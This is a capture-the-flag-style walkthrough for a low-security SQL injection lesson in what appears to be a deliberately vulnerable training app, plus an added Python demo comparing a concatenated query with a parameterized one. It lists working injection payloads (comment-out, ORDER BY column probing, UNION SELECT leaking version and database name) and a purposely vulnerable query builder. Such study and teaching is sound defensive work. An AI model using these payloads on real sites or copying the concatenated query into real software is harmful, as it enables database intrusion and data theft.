SQL Injection (AJAX/JSON/jQuery) - Low Security Level
Solution:
Step 1. Enter any letter in the lesson's text box and check the output.
Note: when you enter a letter, results are displayed.
Step 2. Enter the payloads below as input and check the results:
Payloads:
'-- # (the full list of movies is displayed)
'order by 1-- #
'order by 2-- #
' union select 1,version(),3,4,database(),6,7 -- #
Note: Not covered in this video:
Explore the lesson with other payloads.
For more understanding of the lesson, it is recommended to look at the source code.
Use Burp Suite to intercept the request and test your inputs for correct results.
PseudoTime
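The lesson recommends reading the source code to see why the Step 2 payloads behave as they do. The following is an added example, not the lesson's source code or the author's: it assumes the search builds a LIKE '%...%' query by string concatenation, uses SQLite as a stand-in for MySQL with a constructed 7-column movies table, and runs the page's payloads against that query and against a parameterized one.

```python
import sqlite3

# Constructed sample rows. The 7-column layout is an assumption chosen to match
# the seven values in the lesson's UNION payload.
ROWS = [
    (1, "Gamma Road", 2001, "drama", "Ann", "tt0000001", 10),
    (2, "Alpha Heist", 2005, "action", "Bob", "tt0000002", 20),
    (3, "Beta Storm", 2010, "sci-fi", "Cy", "tt0000003", 30),
]
PAYLOADS = [  # copied from Step 2 of the lesson
    "'-- #",
    "'order by 1-- #",
    "'order by 2-- #",
    "' union select 1,version(),3,4,database(),6,7 -- #",
]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE movies (id, title, release_year, genre,"
               " main_character, imdb, tickets_stock)")
    db.executemany("INSERT INTO movies VALUES (?,?,?,?,?,?,?)", ROWS)
    return db

def search_concatenated(db, title):
    # Assumed vulnerable pattern: the input becomes part of the SQL text, so a
    # quote closes the string literal and "--" comments out the trailing %'.
    sql = "SELECT * FROM movies WHERE title LIKE '%" + title + "%'"
    try:
        return [row[1] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        # SQLite has no version()/database(), so the UNION payload ends here;
        # the error itself shows the input was parsed as SQL.
        return "SQL error: %s" % exc

def search_parameterized(db, title):
    # Hardened form: the input is bound as a value and is only ever compared
    # against titles, whatever characters it contains.
    sql = "SELECT * FROM movies WHERE title LIKE '%' || ? || '%'"
    return [row[1] for row in db.execute(sql, (title,))]

if __name__ == "__main__":
    db = make_db()
    for value in ["g"] + PAYLOADS:
        print(repr(value))
        print("  concatenated :", search_concatenated(db, value))
        print("  parameterized:", search_parameterized(db, value))
```

With the parameterized query every payload returns an empty list, because no title contains that text; an ordinary letter returns the same rows from both functions.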